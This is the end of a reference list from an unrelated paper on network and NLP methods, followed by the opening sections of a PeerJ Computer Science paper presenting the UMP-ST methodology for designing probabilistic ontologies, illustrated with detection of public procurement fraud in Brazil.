Amjad Abu-Jbara, and Dragomir Radev. 2012. Extracting signed social networks from text. TextGraphs-7, page 6. Jorge E. Hirsch. 2005. An index to quantify an indi- vidual’s scientific research output. Proceedings of the National Academy of Sciences of the United states of America, 102(46):16569. Thomas Hofmann. 1999. Probabilistic latent semantic indexing. In Proceedings of the 22nd annual interna- tional ACM SIGIR conference on Research and devel- opment in information retrieval, pages 50–57. ACM. Kalervo Järvelin and Jaana Kekäläinen. 2000. IR evalua- tion methods for retrieving highly relevant documents. In Proceedings of the 23rd annual international ACM SIGIR conference on Research and development in in- formation retrieval, pages 41–48. ACM. In-Su Kang, Seung-Hoon Na, Seungwoo Lee, Hanmin Jung, Pyung Kim, Won-Kyung Sung, and Jong-Hyeok Lee. 2009. On co-authorship for author disam- biguation. Information Processing & Management, 45(1):84–97. Brian Karrer and Mark EJ Newman. 2011. Stochas- tic blockmodels and community structure in networks. Physical Review E, 83(1):016107. Stanley Kok and Chris Brockett. 2010. Hitting the right paraphrases in good time. In Human Language Tech- nologies: The 2010 Annual Conference of the North American Chapter of the Association for Computa- tional Linguistics, pages 145–153. ACL. Oren Kurland and Lillian Lee. 2005. Pagerank without hyperlinks: Structural reranking using links induced by language models. In SIGIR ’05. Renaud Lambiotte and Marcel Ausloos. 2006. Collabo- rative tagging as a tripartite network. Computational Science–ICCS 2006, pages 1114–1117. David Liben-Nowell and Jon Kleinberg. 2007. The link- prediction problem for social networks. Journal of the American society for information science and technol- ogy, 58(7):1019–1031. R.N. Lichtenwalter, J.T. Lussier, and N.V. Chawla. 2010. New perspectives and methods in link prediction. In Proceedings of the 16th ACM SIGKDD international conference on Knowledge discovery and data mining, pages 243–252. ACM. Xiaoming Liu, Johan Bollen, Michael L. Nelson, and Herbert Van de Sompel. 2005. Co-authorship net- works in the digital library research community. Infor- mation processing & management, 41(6):1462–1480. Bo Long, Zhongfei Zhang, and Tianbing Xu. 2008. Clustering on complex graphs. In Proc. the 23rd Conf. AAAI 2008. Angelica Lozano and Giovanni Storchi. 2002. Shortest viable hyperpath in multimodal networks. Transporta- tion Research Part B: Methodological, 36(10):853– 874. Bradley Malin. 2005. Unsupervised name disambigua- tion via social network similarity. In Workshop on Link Analysis, Counterterrorism, and Security, vol- ume 1401, pages 93–102. Sergei Maslov and Sidney Redner. 2008. Promise and pitfalls of extending google’s pagerank algorithm to citation networks. The Journal of Neuroscience, 28(44):11103–11105. Ryan McDonald, Fernando Pereira, Kiril Ribarov, and Jan Hajič. 2005. Non-projective dependency pars- ing using spanning tree algorithms. In Proceedings of the conference on Human Language Technology and Empirical Methods in Natural Language Processing, pages 523–530. ACL. Duncan M. McRae-Spencer and Nigel R. Shadbolt. 2006. Also by the same author: Aktiveauthor, a cita- tion graph approach to name disambiguation. In Pro- ceedings of the 6th ACM/IEEE-CS joint conference on Digital libraries, pages 53–54. ACM. 12 Rada Mihalcea and Paul Tarau. 2004. Textrank: Bring- ing order into texts. In Proceedings of EMNLP, vol- ume 4, pages 404–411. Barcelona, Spain. Rada Mihalcea. 2005. Unsupervised large-vocabulary word sense disambiguation with graph-based algo- rithms for sequence data labeling. In Proceedings of HLT-EMNLP, pages 411–418. ACL. David Mimno, Hanna M. Wallach, Edmund Talley, Miriam Leenders, and Andrew McCallum. 2011. Op- timizing semantic coherence in topic models. In Pro- ceedings of the Conference on Empirical Methods in Natural Language Processing, pages 262–272. ACL. Panchanan Mitra. 2006. Hirsch-type indices for rank- ing institutions scientific research output. Current Sci- ence, 91(11):1439. Tsuyoshi Murata. 2010. Detecting communities from tripartite networks. In Proceedings of the 19th inter- national conference on World wide web, pages 1159– 1160. ACM. Pradeep Muthukrishnan, Dragomir Radev, and Qiaozhu Mei. 2010. Edge weight regularization over mul- tiple graphs for similarity learning. In Data Mining (ICDM), 2010 IEEE 10th International Conference on, pages 374–383. IEEE. Mark E.J. Newman and Juyong Park. 2003. Why social networks are different from other types of networks. Physical Review E, 68(3):036122. Byung-Won On and Dongwon Lee. 2007. Scalable name disambiguation using multi-level graph partition. In Proceedings of the 7th SIAM international conference on data mining, pages 575–580. Lawrence Page, Sergey Brin, Rajeev Motwani, and Terry Winograd. 1999. The pagerank citation ranking: bringing order to the web. Romualdo Pastor-Satorras and Alessandro Vespignani. 2001. Epidemic spreading in scale-free networks. Physical review letters, 86(14):3200–3203. Dragomir R. Radev, Pradeep Muthukrishnan, Vahed Qazvinian, and Amjad Abu-Jbara. 2013. The ACL anthology network corpus. Language Resources and Evaluation, pages 1–26. William M. Rand. 1971. Objective criteria for the eval- uation of clustering methods. Journal of the American Statistical association, 66(336):846–850. S. Redner. 1998. How popular is your paper? an empir- ical study of the citation distribution. The European Physical Journal B-Condensed Matter and Complex Systems, 4(2):131–134. P. Sarkar, A.W. Moore, and A. Prakash. 2008. Fast incre- mental proximity search in large graphs. In Proceed- ings of the 25th international conference on Machine learning, pages 896–903. ACM. Allan A. Sioson. 2005. Multimodal networks in biology. Ph.D. thesis, Virginia Polytechnic Institute and State University. Michael Speriosu, Nikita Sudan, Sid Upadhyay, and Ja- son Baldridge. 2011. Twitter polarity classification with label propagation over lexical links and the fol- lower graph. In Proceedings of the First workshop on Unsupervised Learning in NLP, pages 53–63, Edin- burgh, Scotland, July. ACL. Alexander Strehl and Joydeep Ghosh. 2003. Cluster ensembles—a knowledge reuse framework for com- bining multiple partitions. The Journal of Machine Learning Research, 3:583–617. Yizhou Sun, Jiawei Han, Peixiang Zhao, Zhijun Yin, Hong Cheng, and Tianyi Wu. 2009. Rankclus: inte- grating clustering with ranking for heterogeneous in- formation network analysis. In Proceedings of the 12th International Conference on Extending Database Technology: Advances in Database Technology, pages 565–576. ACM. Yizhou Sun, Rick Barber, Manish Gupta, and Jiawei Han. 2011. Co-author relationship prediction in heteroge- neous bibliographic networks. Yizhou Sun, Charu C. Aggarwal, and Jiawei Han. 2012. Relation strength-aware clustering of heterogeneous information networks with incomplete attributes. Pro- ceedings of the VLDB Endowment, 5(5):394–405. Ben Taskar, Ming-Fai Wong, Pieter Abbeel, and Daphne Koller. 2003. Link prediction in relational data. In Neural Information Processing Systems, volume 15. Robert Tibshirani, Guenther Walther, and Trevor Hastie. 2001. Estimating the number of clusters in a data set via the gap statistic. Journal of the Royal Sta- tistical Society: Series B (Statistical Methodology), 63(2):411–423. Kristina Toutanova, Christopher D Manning, and An- drew Y Ng. 2004. Learning random walk models for inducing word dependency distributions. In Pro- ceedings of the twenty-first international conference on Machine learning, page 103. ACM. Xuerui Wang, Natasha Mohanty, and Andrew McCallum. 2006. Group and topic discovery from relations and their attributes. Technical report, DTIC Document. Kai Yu, Shipeng Yu, and Volker Tresp. 2006. Soft clustering on graphs. Advances in Neural Information Processing Systems, 18:1553. Ding Zhou, Sergey A. Orshanskiy, Hongyuan Zha, and C. Lee Giles. 2007. Co-ranking authors and docu- ments in a heterogeneous network. In Data Mining, 2007. ICDM 2007. Seventh IEEE International Con- ference on, pages 739–744. IEEE. 13 14 work_5jbqrz54ujdzrhn3nbecrse62u ---- Submitted 5 October 2015 Accepted 4 July 2016 Published 15 August 2016 Corresponding author Kathryn B. Laskey, klaskey@gmu.edu Academic editor Sandra Gesing Additional Information and Declarations can be found on page 30 DOI 10.7717/peerj-cs.77 Copyright 2016 Carvalho et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Uncertainty modeling process for semantic technology Rommel N. Carvalho1,2, Kathryn B. Laskey3 and Paulo C.G. Da Costa3 1 Department of Research and Strategic Information, Office of the Comptroller General of Brazil, Brasília, DF, Brazil 2 Department of Computer Science, Universidade de Brasília, Brasília, DF, Brazil 3 Department of Systems Engineering and Operations Research, George Mason University, Fairfax, VA, United States of America ABSTRACT The ubiquity of uncertainty across application domains generates a need for principled support for uncertainty management in semantically aware systems. A probabilistic ontology provides constructs for representing uncertainty in domain ontologies. While the literature has been growing on formalisms for representing uncertainty in ontologies, there remains little guidance in the knowledge engineering literature for how to design probabilistic ontologies. To address the gap, this paper presents the Un- certainty Modeling Process for Semantic Technology (UMP-ST), a new methodology for modeling probabilistic ontologies. To explain how the methodology works and to verify that it can be applied to different scenarios, this paper describes step-by-step the construction of a proof-of-concept probabilistic ontology. The resulting domain model can be used to support identification of fraud in public procurements in Brazil. While the case study illustrates the development of a probabilistic ontology in the PR-OWL probabilistic ontology language, the methodology is applicable to any ontology formalism that properly integrates uncertainty with domain semantics. Subjects Artificial Intelligence, World Wide Web and Web Science, Software Engineering Keywords PR-OWL, MEBN, UP, Methodology, UMP-ST, Semantic Web, Bayesian networks, Uncertainty, Modeling, Semantic technology INTRODUCTION The ability to represent and reason with uncertainty is important across a wide range of domains. For this reason, there is a need for a well-founded integration of uncertainty representation into ontology languages. In recognition of this need, the past decade has seen a significant increase in formalisms that integrate uncertainty representation into ontology languages. This has given birth to several new languages such as: PR-OWL (Costa, 2005; Costa, Laskey & Laskey, 2005; Costa, Laskey & Laskey, 2008; Carvalho, 2011; Carvalho, Laskey & Costa, 2013), OntoBayes (Yang & Calmet, 2005), BayesOWL (Ding, Peng & Pan, 2006), P-CLASSIC (Koller, Levy & Pfeffer, 1997) and probabilistic extensions of SHIF(D) and SHOIN(D) (Lukasiewicz, 2008). However, the increased expressive power of these languages creates new challenges for the ontology designer. In addition to developing a formal representation of entities and relationships in a domain, the ontology engineer must develop a formal characterization of the uncertainty associated with attributes of entities and relationships among them. How to cite this article Carvalho et al. (2016), Uncertainty modeling process for semantic technology. PeerJ Comput. Sci. 2:e77; DOI 10.7717/peerj-cs.77 https://peerj.com mailto:klaskey@gmu.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.77 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.77 While a robust literature exists in both ontology engineering (Allemang & Hendler, 2011; Gomez-Perez, Corcho & Fernandez-Lopez, 2004) and knoweldge engineering for probability models (Laskey & Mahoney, 2000; Druzdzel & Van der Gaag, 2000; Korb & Nicholson, 2003; O’Hagan et al., 2006), these fields have developed largely independently. The literature contains very little guidance on how to build ontologies that capture knowledge about domain uncertainties. To fill the gap, this paper describes the Uncertainty Modeling Process for Semantic Technology (UMP-ST), a methodology for defining a probabilistic ontology and using it for plausible reasoning in applications that use semantic technology. The methodology is illustrated through a use case in which semantic technology is applied to the problem of identifying fraud in public procurement in Brazil. The purpose of the use case is to show how to apply the methodology on a simplified but realistic problem, and to provide practical guidance to probabilistic ontology designers on how to apply the UMP-ST. This paper goes beyond previous work on UMP-ST (e.g., Haberlin, 2013; Carvalho et al., 2011; Alencar, 2015) to provide a comprehensive explanation of the methodology in the context of application to a real world problem, along with pragmatic suggestions for how to apply the methodology in practice. For purpose of exposition, our focus is primarily on the procurement fraud use case, but the UMP-ST is applicable to any domain in which semantic technology can be applied. Our purpose is not to provide rigorous scientific evidence for the value of UMP-ST in comparison with any other methodology or no methodology. De Hoog (1998) says, ‘‘it is extremely difficult to judge the value of a methodology in an objective way. Experimentation is of course the proper way to do it, but it is hardly feasible because there are too many conditions that cannot be controlled.’’ The value of a methodology like UMP-ST lies in its ability to support a complex system development effort that extends over a long period of time and requires significant resources to implement. Besides the large number of uncontrolled variables, the resources to implement a single case of sufficient complexity is difficult; experimentation requiring multiple parallel implementations is prohibitive. Nevertheless, the experience of our development team is that the structure provided by UMP-ST was essential to the ability to capture the expert’s knowledge in a model whose results were a reasonable match to the expert’s judgments. The paper is organized as follows. The next section reviews existing design methodologies that provided inspiration for UMP-ST. The following section introduces the UMP-ST. Next, we introduce our use case devoted to identifying fraud in public procurement in Brazil. The fifth section explains the four disciplines of the UMP-ST in the context of the fraud use case, and is followed by a section discussing applicability of the UMP-ST to other domains. The paper concludes with a section on future work and a final section presenting our concluding remarks. RELATED WORK Successful development of any complex system requires following a structured, systematic process for design, implementation and evaluation. Existing software and systems Carvalho et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.77 2/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.77 engineering processes are useful as starting points, but must be tailored for engineering a probabilistic ontology. The UMP-ST draws upon a number of related processes for software engineering, ontology engineering, and Bayesian network engineering to provide a process tailored to probabilistic ontology engineering. To provide a context for introducing the UMP-ST, this section reviews related literature on design processes that provided an initial basis for tailoring the UMP-ST. The unified process The Unified Process (UP) is a widely applied software engineering process (Jacobson, Booch & Rumbaugh, 1999; Kruchten, 2000; Balduino, 2007). It has three main characteristics: (1) it is iterative and incremental; (2) it is architecture centric; and (3) it is risk focused. Each project is divided into small chunks, called iterations, each concluding in delivery of executable code. These frequent deliverables yield an incremental implementation of the system. A key deliverable is the executable architecture, which is a partial implementation of the system that validates the architecture and builds the foundation of the system. Finally, the UP mitigates risk by prioritizing the highest risk features for early implementation. The reasoning is simple: if a critical aspect of the system is going to fail, it is better to discover this early enough to rework the design or cancel the project, than to realize after the fact that large amounts of resources have been wasted on a non-viable project. The UP defines the project lifecycle as composed of four phases: (1) Inception; (2) Elaboration; (3) Construction; and (4) Transition. Inception is usually the shortest phase. The main goal is to define the justification for the project, its scope, the risks involved, and the key requirements. In the elaboration phase, the primary concerns are to define most of the requirements, to address the known risks, and to define and validate the system architecture. The Construction phase is the longest phase, where most of the development process resides. This phase is usually broken down into small iterations with executable code being delivered at the end of each iteration. Finally, in the Transition phase the system is deployed, the users are trained, and initial feedback is collected to improve the system. To support the project lifecycle, the UP defines several disciplines or workflows. Each discipline describes a sequence of activities in which actors or workers produce products or artifacts to achieve a result of observable value. For example, a developer might carry out a programming activity using the system specification in order to produce both source and executable code. There are several variations of the Unified Process (e.g., Rational Unified Process, Agile Unified Process, Enterprise Unified Process). While each has its own set of disciplines, the following disciplines are common to most: Business Modeling, responsible for documenting the business processes in a language common to both business and software communities; Requirements, responsible for defining what the system should do based on the information gathered from the customer; Analysis & Design, responsible for showing how the system will be realized in the implementation phase; Implementation, responsible for developing the code necessary to implement the elicited requirements; Test, which verifies and validates the code developed; and Deployment, responsible for delivering the software to the end user. Carvalho et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.77 3/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.77 Ontology engineering According to Gomez-Perez, Corcho & Fernandez-Lopez (2004), the first workshop on Ontological Engineering was held in conjunction with the 12th European Conference on Artificial Intelligence in 1996. Since then, several methodologies for building ontologies have been proposed. Gomez-Perez, Corcho & Fernandez-Lopez (2004) compare several different method- ologies used for building ontologies in the context of the METHONTOLOGY ontology development process (Fernández-López, Gómez-Pérez & Juristo, 1997). METHONTOLOGY identifies activities that are performed to build ontologies. The three main activity categories are: (1) ontology management activities; (2) ontology development oriented activities; and (3) ontology support activities. The ontology management activities include: (1) scheduling, which identifies activities, their dependency, the resources needed in each, and how long they will take; (2) control, which guarantees that the project is going according to schedule; and (3) quality assurance, which verifies if the products generated from the scheduled activities are satisfactory. These activities are general enough that they can be imported from other frameworks that are not specific to ontology engineering, such as the Project Management Body of Knowledge (PMBoK), which is a general guide to project management. PMBoK includes activities such as scheduling, control, among others (Project Management Institute, 2004). Because these are generic activities, it is not surprising that only one, the On-To-Knowledge (OTKM) methodology (Sure, Staab & Studer, 2004), out of seven methodologies analyzed and compared by Gomez-Perez, Corcho & Fernandez-Lopez (2004) describes these activities in detail. The METHONTOLOGY methodology only proposes these activities, but does not describe them in detail. The ontology development oriented activities are divided into three different steps: (1) pre-development; (2) development; and (3) post-development activities. Pre-development involves: (1a) an environment study to understand where the ontology will be used, which applications will use it, etc.; and (1b) a feasibility study in order to assess if it is worthwhile, feasible, and cost-effective to build this ontology. Although these are important activities, they are not addressed in most of the methodologies for building ontologies. According to Gomez-Perez, Corcho & Fernandez-Lopez (2004) only the METHONTOLOGY methodology proposes the environment study and describes the feasibility study. Development activities include: (2a) the specification activity, which describes why the ontology is being built, its purpose, etc.; (2b) the conceptualization activity, which describes and organizes the domain knowledge; (2c) the formalization activity, which evolves the conceptual model into a more formal model; and (2d) the implementation activity, which creates the desired ontology in the chosen language. As expected, these are the main activities addressed by the ontology engineering methodologies. The methodologies analyzed by Gomez-Perez, Corcho & Fernandez-Lopez (2004) proposed or described most of these development activities, with the exception of Cyc (Reed & Lenat, 2002), which only addresses the implementation activity and does not mention the others. Post-development activities involve (3a) maintenance, which updates and fixes the ontology, and (3b) (re)use of the ontology being developed by other ontologies and Carvalho et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.77 4/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.77 applications. These are also important activities; however, most of the methodologies only address them as a natural step during the ontology’s life cycle, which can be incremental, producing a sequence of evolving prototypes. None of the methodologies presented by Gomez-Perez, Corcho & Fernandez-Lopez (2004) describes these activities. Only the METHONTOLOGY and OTKM methodologies propose some of these activities, but do not provide much detail. Finally, ontology support activities include: (1) knowledge acquisition, which extracts domain knowledge from subject matter experts (SMEs) or through some automatic process, called ontology learning; (2) evaluation, in order to validate the ontology being created; (3) integration, which is used when other ontologies are used; (4) merging, which is important for creating a new ontology based on a mix of several other ontologies from the same domain; (5) alignment, which involves mapping different concepts to/from the involved ontologies; (6) documentation, which describe all activities completed and products generated for future reference; and (7) configuration management, which controls the different versions generated for all ontologies and documentation. Out of the seven methodologies compared by Gomez-Perez, Corcho & Fernandez-Lopez (2004), five neither propose nor mention configuration management, merging, or alignment. The integration activity is proposed by six of them, but not described in detail. The knowledge acquisition and documentation activities are proposed by three and described by two, while the evaluation activity is proposed and described by two in detail. Probability elicitation The literature on eliciting probabilities from experts has a long history (e.g., Winkler, 1967; Huber, 1974; Wallsten & Budescu, 1983). At the interface between cognitive science and Bayesian probability theory, researchers have examined biases in unaided human judgment (e.g., Kahneman, Slovic & Tversky, 1982) and have devised ways to counteract those biases (e.g., Clemen & Reilly, 2004; Burgman et al., 2006). Several authors have defined structured processes or protocols for eliciting probabilities from experts (e.g., Clemen & Reilly, 2004; Garthwaite, Kadane & O’Hagan, 2005). There is general agreement on the steps in the elicitation process. The seven steps described by Clemen & Reilly (2004) are: understanding the problem; identifying and recruiting experts; motivating the experts; structuring and decomposition; probability and assessment training; probability elicitation and verification; and aggregating the probabilities. A recent comprehensive reference for probability elicitation is O’Hagan et al. (2006). The advent of graphical probability models (Pearl, 1988) has created the problem of eliciting the many probabilities needed to specify a graphical model containing dozens to hundreds of random variables (cf., Druzdzel & Van der Gaag, 2000; Renooij, 2001). Mahoney & Laskey (1998) defined a systematic process for constructing Bayesian network models. Their process considered elicitation of structural assumptions as well as probability distributions. It is an iterative and incremental process that produces a series of prototype models. The lessons learned from building each prototype model are used to identify requirements for refining the model during the next cycle. Carvalho et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.77 5/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.77 UNCERTAINTY MODELING PROCESS FOR SEMANTIC TECHNOLOGY The process of creating and using a probabilistic ontology typically occurs in three stages: first is modeling the domain; next is populating the model with situation-specific information; and third is using the model and situation-specific information for reasoning. Modeling a domain means constructing a representation of aspects of the domain for purposes of understanding, explaining, predicting, or simulating those aspects. For our purposes, the model represents the kinds of entities that can exist in the domain, their attributes, the relationships they can have to each other, the processes in which they can participate, and the rules that govern their behavior. It also includes uncertainties about all these aspects. There are many sources of uncertainty: e.g., causes may be non- deterministically related to their effects; events may be only indirectly observable through noisy channels; association of observations to the generating events may be unknown; phenomena in the domain may be subject to statistical fluctuation; the structure of and associations among domain entities may exhibit substantial variation; and/or the future behavior of domain entities may be imperfectly predictable (e.g., Schum & Starace, 2001; Laskey & Laskey, 2008; Costa et al., 2012). Once these and other relevant sources of uncertainty are captured in a domain model, the model can be applied to a specific situation by populating it with data about the situation. Finally, the inference engine can be called upon to answer queries about the specific situation. Unlike traditional semantic systems that can handle only deterministic queries, queries with a probabilistic ontology can return soft results. For example, consider a query about whether an inappropriate relationship exists between a procurement official and a bidder. A reasoning system for a standard ontology can return only procurements in which such a relationship can be proven, while a reasoner for a probabilistic ontology can return a probability that such a relationship exists. The UMP-ST is an iterative and incremental process, based on the UP, for designing a probabilistic ontology. While UP serves as the starting point, UMP-ST draws upon and is consistent with the ontology engineering and probability elicitation processes described in the previous sections, thus tailoring the UP for probabilistic ontology design. As shown in Fig. 1, the UMP-ST includes all phases of the UP, but focuses only on the Requirements, Analysis & Design, Implementation, and Test disciplines. The figure depicts the intensity of each discipline during the UMP-ST. Like the UP, UMP-ST is iterative and incremental. The basic idea behind iterative enhancement is to model the domain incrementally, allowing the modeler to take advantage of what is learned during earlier iterations of the model in designing and implementing later iterations. For this reason, each phase includes all four disciplines, but the emphasis shifts from requirements in the earlier phases toward implementation and test in the later phases. Note that testing occurs even during the Inception phase, prior to beginning the implementation phase. This is because it is usually possible to test some aspects of the model during the Analysis & Design Carvalho et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.77 6/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.77 Figure 1 Uncertainty Modeling Process for Semantic Technology (UMP-ST). stage prior to implementation. It is well known that early testing reduces risk, saves cost, and leads to better performance (INCOSE, 2015). Figure 2 presents the Probabilistic Ontology Modeling Cycle (POMC). This cycle depicts the major outputs from each discipline and the natural order in which the outputs are produced. Unlike the waterfall model (Royce, 1970), the POMC cycles through the steps iteratively, using what is learned in one iteration to improve the result of the next. The arrows reflect the typical progression, but are not intended as hard constraints. Indeed, it is possible to have interactions between any pair of disciplines. For instance, it is not uncommon to discover a problem in the rules defined in the Analysis & Design discipline during the activities in the Test discipline. As a result, the engineer might go directly from Test to Analysis & Design in order to correct the problem. In Fig. 2, the Requirements discipline (blue box) defines the goals that must be achieved by reasoning with the semantics provided by our model. Usually, when designing a PO, one wants to be able to automate a reasoning process that involves uncertainty. By goals, we mean the kinds of questions the user wants the system to be able to answer via the PO reasoning. For instance, one of the main goals in the procurement fraud domain is to be able to answer with a certain degree of certainty whether a procurement presents any signs of fraud. However, this type of question is not straight-forward to answer. Thus, the system will typically need to evaluate a set of more specific questions, or queries, in order to better assess the probability of having fraud. Furthermore, in order to answer these more specific queries, the system will need some evidence. These goals, queries, and evidence comprise the requirements for the model being designed. The Analysis & Design discipline (green boxes) describes classes of entities, their attributes, how they relate to each other, and what rules apply to them in our domain. These definitions are independent of the language used to implement the model. Carvalho et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.77 7/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.77 Figure 2 Probabilistic Ontology Modeling Cycle (POMC)—Requirements in blue, Analysis & Design in green, Implementation in red, and Test in purple. The Implementation discipline (red boxes) maps the design to a specific language that is both semantically rich and capable of representing uncertainty. This means encoding the classes, attributes, relationships and rules in the chosen language. For our case study, the mapping is to PR-OWL (Carvalho, Laskey & Costa, 2013; Costa, Laskey & Laskey, 2008), but other semantically rich uncertainty representation languages could also be used (e.g., Cozman & Mauá, 2015). Finally, the Test discipline (purple box) is responsible for evaluating whether the model developed during the Implementation discipline is behaving as expected from the rules defined during Analysis & Design and whether the results achieve the goals elicited during the Requirements discipline. As noted previously, it is a good idea to test some of the rules and assumptions even before implementation. This is a crucial step to mitigate risk. Early testing can identify and correct problems before significant resources have been spent developing a complex model that turns out to be inadequate. Like several of the ontology engineering processes considered by Gomez-Perez, Corcho & Fernandez-Lopez (2004), the UMP-ST does not cover ontology management, under the assumption that these activities can be imported from other frameworks. Although the UMP-ST does not cover maintenance and reuse, its iterative nature supports incremental evolution of the developed ontology. Of the ontology support activities described by Gomez-Perez, Corcho & Fernandez-Lopez (2004), the UMP-ST process explicitly addresses only the test discipline, which is similar to the evaluation activity. By following the steps in the UMP-ST, the ontology designer will be generating the documentation needed in order to describe not only the final PO, but also the whole process of building it. This Carvalho et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.77 8/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.77 supports the documentation activity of Gomez-Perez, Corcho & Fernandez-Lopez (2004). Like most ontology engineering processes, the UMP-ST does not address the ontology support activities of integration, merging, and alignment. The primary focus of the UMP-ST is the ontology development activities. Because it is based on the UP, it uses a different nomenclature than Gomez-Perez, Corcho & Fernandez-Lopez (2004), but there is a close resemblance: the specification activity is similar to the requirements discipline; the conceptualization and formalization activities are similar to the analysis & design discipline; and the implementation activity is similar to the implementation discipline. The major difference between the methodologies reviewed by Gomez-Perez, Corcho & Fernandez-Lopez (2004) and the UMP-ST is the focus. While Gomez-Perez, Corcho & Fernandez-Lopez (2004) focus on ways to build a glossary of terms, build taxonomies, and define concepts, properties, and deterministic rules the UMP-ST presents techniques to identify and specify probabilistic rules, define dependency relations between properties based on these rules, and quantify the strength of these relations as parameters of local probability distributions. Thus, the UMP-ST extends other methodologies used for building ontologies, and should coexist with these methodologies. When creating deterministic parts of the ontology the user can follow existing methodologies proposed for standard ontology building. To incorporate uncertainty and therefore extend to a probabilistic ontology, the user can follow the steps defined in the UMP-ST process. Similarly, the UMP-ST can and should coexist with processes for eliciting probabilities, such as those defined by Clemen & Reilly (2004) and O’Hagan et al. (2006). The probabilistic ontology engineer should refer to these resources when defining a protocol for eliciting probabilities from experts. In the next two sections, the UMP-ST process and the POMC are illustrated through a case study in procurement fraud detection and prevention. The case study walks step-by-step through the activities that must be executed in each discipline in the POMC. The case study has been kept simple enough for clear exposition of POMC, while being complex enough to convey key issues that arise in real-world ontology engineering. Implementation and plausible reasoning were carried out using the UnBBayes probabilistic ontology environment (Carvalho, 2008; Matsumoto et al., 2011). PREVENTING AND DETECTING PROCUREMENT FRAUD IN BRAZIL In Brazil, the main law that details the regulation of the public procurement process is the Federal Law 8,666/93 (Public Procurement Law). The public procurement procedures are also mentioned in Section XXI, Article 37 of the Federal Constitution. The Public Procurement Law is applicable not only to the Federal Government, but also to the State and Municipal Governments. Although it is meant to provide just general guidelines, it is so detailed that there is little room for the States and Municipalities to further legislate (Frizzo & Oliveira, 2014). The Public Procurement Law regulates public procurement procedures and contracts involving the government. Carvalho et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.77 9/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.77 The Public Procurement Law defines three main procurement procedures: invitation to tender, which is a simpler and faster procedure where at least three competitors are invited to participate in the tender based on the request for proposals (RFP), which is not required to be advertised in the press; price survey, which requires the competitors to be previously registered before the public tender and requires a broader advertising of the RFP in the newspaper and official press; and competition, which is the most complex and longest procedure, allowing participation of all companies that meet the qualification criteria on the first day of the procedure and requiring more general advertising of the RFP as the price survey. In addition, Law 10,520/02 created the reverse auction, which involves alternative bids from the participating companies in the competitive phase, before the qualification documents are analyzed. Nowadays, the most common procedure for the acquisition of common goods and services is the electronic reverse auction, which is the same as the reverse auction, but the procedure happens in an electronic system. Its RFP must also be advertised in the official press as well as through the Internet. The criteria for selecting the best proposal are defined in the RFP by the regulated agency. There are three main types of rules that must be followed: best price, where the company that presents the best bid and meets the minimum requirements is awarded the contract; best technique, where the company with the best technical solutions wins regardless of price; and a mix of the two, where scores are given for both price and technique and the company with the highest joint score wins. Frizzo & Oliveira (2014) provide additional detail on thresholds for determining whether a contract is subject to the Public Procurement Law, freedom to choose which procedure to use, changes to an existing contract, and other aspects of the public procurement process in Brazil. The procurement process presents many opportunities for corruption. Although laws attempt to ensure a competitive and fair process, perpetrators find ways to turn the process to their advantage while appearing to be legitimate. To aid in detecting and deterring such perversions of the procurement process, a specialist, who helped in this work, has didactically structured different kinds of procurement fraud encountered by the Brazilian Office of the Comptroller General (CGU, Controladoria-Geral da União, in Portuguese) over the years. These different fraud types are characterized by criteria, such as business owners working as a front for the company or use of accounting indices that are not commonly employed. Indicators have been established to help identify cases of each of these fraud types. For instance, one principle that must be followed in public procurement is that of competition. A public procurement should attempt to ensure broad participation in the bidding process by limiting requirements on bidders to what is necessary to guarantee adequate execution of the contract. Nevertheless, it is common to have a fake competition in which different bidders are, in fact, owned by the same person. This is usually done by having someone act as a front for the enterprise. An indicator that a bidder may be a front is that the listed owner has little or no education. Thus, an uneducated owner is a red flag suggesting that there may be a problem with the procurement. Carvalho et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.77 10/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.77 Gregorini (2009) identified a number of red flags that can be considered evidence of fraud. These include: concentration of power in the hands of a few people; rapid growth in concentration of goods and services contracted from a single company; competition restriction; transfer of funds to a Non Governmental Organization (NGO) close to elections; and others. While these factors are evidence of potential irregularities, they are not definitive indicators. A list of more serious and determinant conditions is presented by Flores (2004). These include: choosing directors based on a political agenda; negotiating contracts in order to reserve money for an election campaign; negotiating contracts in order to favor friends and family; bribery in order to obtain certain privileges; and providing inside information. A more formal definition of different types of fraud found in Brazil is presented by Oliveira (2009). He presents three main groups of fraud, based on recent scandals in Brazil: frauds initiated by passive agents; frauds initiated by active agents; and frauds that represent collusion. The first is when an agent from the Public Administration, acting in his public function, favors someone or himself by performing illicit actions (e.g., purchasing products that were never used, falsification of documents and signatures, favoring friends and family). The second is when an active agent, a person or a company, outside the Public Administration tries to corrupt an agent that works in the Public Administration or does something illegal in order to cheat the procurement process (e.g., acting as a front for a company, delivering contraband products, giving money to civil servants in order to favor a specific company). Finally, the third is when there is some type of collusion between companies participating in the procurement process or even between passive and active agents (e.g., delivering and accepting just part of the goods purchased, paying before receiving the merchandise, overpricing goods and services, directing and favoring a specific company in exchange for some financial compensation). The types of fraud presented by Oliveira (2009), although focused on the Brazilian context, are consistent with more recent work from Dhurandhar et al. (2015b). This work, which presents a more general fraud taxonomy related to procurement fraud, was registered as a patent in 2015 (Dhurandhar et al., 2015a). While Oliveira talks about passive and active agents, Dhurandhar et al. talks about fraud by employees and fraud by vendors, respectively. However, these fraud definitions do have a few differences. For example, while Dhurandhar et al. 